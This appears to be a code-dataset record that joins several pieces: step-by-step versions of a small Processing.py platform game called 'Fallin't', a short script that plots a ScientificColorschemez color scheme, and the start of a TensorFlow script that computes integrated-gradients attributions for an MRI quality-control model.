100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
"step-3": "<mask token>\ndelay = 3000\nstartOfGame = False\n\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
"step-4": "from platform_class import *\nfrom player_class import *\nfrom functions import *\ndelay = 3000\nstartOfGame = False\n\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
"step-5": "from platform_class import *\nfrom player_class import *\nfrom functions import *\n\ndelay = 3000\nstartOfGame = False\n\n\n# def keyPressed():\n# startOfGame = True\n# print(startOfGame)\n# if (keyCode == 'B'):\n# print(\"I am pressed\")\n# startOfGame = True\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n \n \ndef setup():\n #global setup options\n size(500, 800)\n rectMode(CENTER)\n \n # sb = loadImage(\"assets\\\\gameover.jpg\")\n # sb.resize(width, height)\n # background(sb)\n \n global atStartUp\n atStartUp = True\n \n global startTimeMs\n startTimeMs = millis()\n \n global bg, go, sb\n bg = loadImage(\"assets\\\\background.png\")\n bg.resize(width, height)\n go = loadImage(\"assets\\\\gameover.jpg\")\n go.resize(width, height)\n sb = loadImage(\"assets\\\\start.png\")\n sb.resize(width, height)\n \n global startOfGame\n startOfGame = False\n \n #list of platforms\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n \ndef draw():\n global atStartUp\n if (atStartUp):\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n \n frameRate(30)\n background(bg)\n for platform in platforms:\n # print (len(platforms))\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n \n #this ends the game if the player falls off the screen\n if p1.ypos > height+25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text(\"GAME\", width/2, 2*height/10)\n text(\"OVER\", width/2, 3*height/10)\n textSize(30)\n fill(240,225,48)\n text(\"Score: \"+str(p1.score/100), width/2, 0.5*height/10)\n textSize(20)\n fill(255, 255, 255)\n text(\"Click anywhere on the screen to RETRY\", width/2, 8*height/10)\n text(\"Press ESC to exit\", width/2, 8.5*height/10)\n textSize(10)\n fill(240,225,48)\n text(\"Made by Priyam Sahoo\", width/2, 9.5*height/10)\n textAlign(LEFT)\n noLoop()\n \n \ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240,225,48)\n text(\"Welcome to Fallin't\", width/2, 0.25*height/2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width/2, 1.65*height/2)\n \n \n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from ScientificColorschemez import Colorschemez
import matplotlib.pyplot as plt
cs = Colorschemez.latest()
for name, hexcode in zip(cs.colornames, cs.colors):
print('%s: %s' % (hexcode, name))
fig, ax = plt.subplots()
cs.example_plot(ax)
fig.savefig('latest.png', dpi=200, bbox_inches='tight')
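# Optional follow-up sketch (not in the original; it assumes cs.colors is a
# list of hex strings, which matches how the loop above prints them): install
# the fetched scheme as matplotlib's default color cycle.
from cycler import cycler
plt.rcParams['axes.prop_cycle'] = cycler(color=cs.colors)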
|
flexible
|
{
"blob_id": "7106a8ddbec60ce4b7d9e8e5ce8d7df02e5f7222",
"index": 6854,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\n<mask token>\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n",
"step-3": "<mask token>\ncs = Colorschemez.latest()\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\nfig, ax = plt.subplots()\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n",
"step-4": "from ScientificColorschemez import Colorschemez\nimport matplotlib.pyplot as plt\ncs = Colorschemez.latest()\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\nfig, ax = plt.subplots()\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import argparse
import gc
import gcsfs
import nibabel as nib
import nilearn
import nobrainer
import numpy as np
import os
import os.path as op
import pandas as pd
import tensorflow as tf
def interpolate_images(baseline, image, alphas):
alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]
baseline_x = tf.expand_dims(baseline, axis=0)
input_x = tf.expand_dims(image, axis=0)
delta = input_x - baseline_x
images = baseline_x + alphas_x * delta
return images
def compute_gradients(model, images, target_class):
with tf.GradientTape() as tape:
tape.watch(images)
raw_probs = model(images)
probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class
gradients = tape.gradient(probs, images)
return gradients
def integral_approximation(gradients):
# riemann_trapezoidal
grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)
return tf.math.reduce_mean(grads, axis=0)
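# Worked micro-example for integral_approximation (comment only): gradients
# [0., 1., 2.] give pairwise trapezoid means [0.5, 1.5], whose mean over the
# alpha axis is 1.0 -- the trapezoidal estimate used above.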
@tf.function
def integrated_gradients(
model, baseline, image, target_class, m_steps=50, batch_size=32
):
# 1. Generate alphas.
alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)
# Initialize TensorArray outside loop to collect gradients.
gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)
# Iterate alphas range and batch computation for speed, memory efficiency, and scaling to larger m_steps.
for alpha in tf.range(0, len(alphas), batch_size):
from_ = alpha
to = tf.minimum(from_ + batch_size, len(alphas))
alpha_batch = alphas[from_:to]
# 2. Generate interpolated inputs between baseline and input.
interpolated_path_input_batch = interpolate_images(
baseline=baseline, image=image, alphas=alpha_batch
)
# 3. Compute gradients between model outputs and interpolated inputs.
gradient_batch = compute_gradients(
model=model,
images=interpolated_path_input_batch,
target_class=target_class,
)
# Write batch indices and gradients to extend TensorArray.
gradient_batches = gradient_batches.scatter(tf.range(from_, to), gradient_batch)
# Stack path gradients together row-wise into single tensor.
total_gradients = gradient_batches.stack()
# 4. Integral approximation through averaging gradients.
avg_gradients = integral_approximation(gradients=total_gradients)
# 5. Scale integrated gradients with respect to input.
return (image - baseline) * avg_gradients
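# Usage sketch (an added comment; the names here are assumptions, not taken
# from the script): with a Keras `model` over (128, 128, 128, 5) volumes and a
# zero `baseline`,
#   attribution = integrated_gradients(model, baseline, volume,
#                                      target_class=1, m_steps=64, batch_size=8)
# IG's completeness property then makes tf.reduce_sum(attribution) approximate
# model(volume[None]) - model(baseline[None]) for the target class.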
def main(
gcs_bucket,
n_channels=5,
dataset_name="b0-tensorfa-dwiqc",
model_dir="b0_tensorfa_dwiqc",
dataset_seed=8,
target_class=1,
confusion_class="true_pos",
):
print("Setting gpu thread mode to gpu_private.")
os.environ["TF_GPU_THREAD_MODE"] = "gpu_private"
print("Configuring distribution strategy")
use_tpu = False
try:
resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu="")
tf.config.experimental_connect_to_cluster(resolver)
# This is the TPU initialization code that has to be at the beginning.
tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.TPUStrategy(resolver)
use_tpu = True
print("TPU detected.")
print("All devices: ", tf.config.list_logical_devices("TPU"))
except ValueError:
strategy = tf.distribute.MirroredStrategy()
print("GPUs detected.")
print("Number of accelerators: ", strategy.num_replicas_in_sync)
# Train using mixed-precision policy
tf.keras.mixed_precision.set_global_policy("mixed_float16")
scope = strategy.scope()
# Setting location were training logs and checkpoints will be stored
GCS_BASE_PATH = f"gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}"
GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, "saved_model")
GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, "integrated_gradients")
fs = gcsfs.GCSFileSystem()
LOCAL_SAVED_MODEL_DIR = "saved_model"
LOCAL_OUTPUT_DIR = "output"
os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)
os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)
fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)
# Specify the datasets on GCP storage
GCS_DATA_PATH = f"gs://{gcs_bucket}"
GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, "tfrecs", dataset_name, "all-data")
if use_tpu:
device_alldata_dir = GCS_ALLDATA_DIR
else:
LOCAL_ALLDATA_DIR = op.join(".", "tfrecs", dataset_name, "all-data")
os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)
fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)
device_alldata_dir = LOCAL_ALLDATA_DIR
volume_shape = (128, 128, 128, n_channels)
element_spec = (
tf.TensorSpec(shape=(), dtype=tf.int64, name=None),
(
tf.TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None),
tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None),
),
)
dataset = tf.data.experimental.load(
op.join(device_alldata_dir, confusion_class),
element_spec=element_spec,
)
volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]
baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)
print("Computing integrated gradients")
with scope:
model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)
ig_attributions = [
integrated_gradients(
model=model,
baseline=baseline,
image=volume,
target_class=target_class,
m_steps=128,
batch_size=1,
)
for volume in volumes
]
if target_class == 1:
postfix = "attribution_pass"
else:
postfix = "attribution_fail"
ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))
tf.data.experimental.save(
ig_dataset,
op.join(LOCAL_OUTPUT_DIR, f"ig_{confusion_class}_{postfix}"),
)
affine = np.diag([1, 1, 1, 1])
volume_niftis = [
{
"b0": nib.Nifti1Image(volume[:, :, :, 3].numpy(), affine),
"color_fa": nib.Nifti1Image(volume[:, :, :, :3].numpy(), affine),
}
for volume in volumes
]
ig_niftis = [
{
"b0": nib.Nifti1Image(attribution[:, :, :, 3].numpy(), affine),
"color_fa": nib.Nifti1Image(attribution[:, :, :, :3].numpy(), affine),
"sum": nib.Nifti1Image(
tf.math.reduce_sum(attribution[:, :, :, :4], axis=-1).numpy(), affine
),
}
for attribution in ig_attributions
]
for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis, ig_niftis)):
for key, value in volume_nifti.items():
nib.save(
value,
op.join(LOCAL_OUTPUT_DIR, f"{confusion_class}_{key}_{idx}.nii.gz"),
)
for key, value in ig_nifti.items():
nib.save(
value,
op.join(
LOCAL_OUTPUT_DIR, f"{confusion_class}_{postfix}_{key}_{idx}.nii.gz"
),
)
fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--gcs_bucket",
type=str,
help=(
"The name of the gcs bucket that will contain the saved models, "
"checkpoints, etc."
),
)
parser.add_argument(
"--n_channels",
type=int,
help="The number of channels in the data.",
default=5,
)
parser.add_argument(
"--dataset_name",
type=str,
help="The name of the dataset in the tfrecs folder of the GCS bucket.",
default="b0-tensorfa-dwiqc",
)
parser.add_argument(
"--model_dir",
type=str,
help="The name of the GCS directory in which the tensorflow model is saved.",
default="b0_tensorfa_dwiqc",
)
parser.add_argument(
"--dataset_seed",
type=int,
help="The seed for the dataset",
default=8,
)
parser.add_argument(
"--target_class",
type=int,
help="The target class for the integrated gradients.",
default=1,
)
parser.add_argument(
"--confusion_class",
type=str,
help="The confusion class for which to compute integrated gradients",
default="true_pos",
)
args = parser.parse_args()
main(
gcs_bucket=args.gcs_bucket,
n_channels=args.n_channels,
dataset_name=args.dataset_name,
model_dir=args.model_dir,
dataset_seed=args.dataset_seed,
target_class=args.target_class,
confusion_class=args.confusion_class,
)
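# Example invocation (hypothetical script and bucket names, added for clarity):
#   python compute_integrated_gradients.py --gcs_bucket my-qc-bucket \
#       --confusion_class true_pos --target_class 1 --dataset_seed 8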
|
normal
|
{
"blob_id": "848e4abcd0b4f118030fc62f1272a19bfce9db4e",
"index": 178,
"step-1": "<mask token>\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n<mask token>\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, 
op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(model, baseline, image, target_class, m_steps=50,\n batch_size=32):\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n interpolated_path_input_batch = interpolate_images(baseline=\n baseline, image=image, alphas=alpha_batch)\n gradient_batch = compute_gradients(model=model, images=\n interpolated_path_input_batch, target_class=target_class)\n gradient_batches = gradient_batches.scatter(tf.range(from_, to),\n gradient_batch)\n total_gradients = gradient_batches.stack()\n avg_gradients = integral_approximation(gradients=total_gradients)\n return (image - baseline) * avg_gradients\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 
128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(model, baseline, image, target_class, m_steps=50,\n batch_size=32):\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n interpolated_path_input_batch = interpolate_images(baseline=\n baseline, image=image, alphas=alpha_batch)\n gradient_batch = compute_gradients(model=model, images=\n interpolated_path_input_batch, target_class=target_class)\n gradient_batches = gradient_batches.scatter(tf.range(from_, to),\n gradient_batch)\n total_gradients = gradient_batches.stack()\n avg_gradients = integral_approximation(gradients=total_gradients)\n return (image - baseline) * avg_gradients\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n 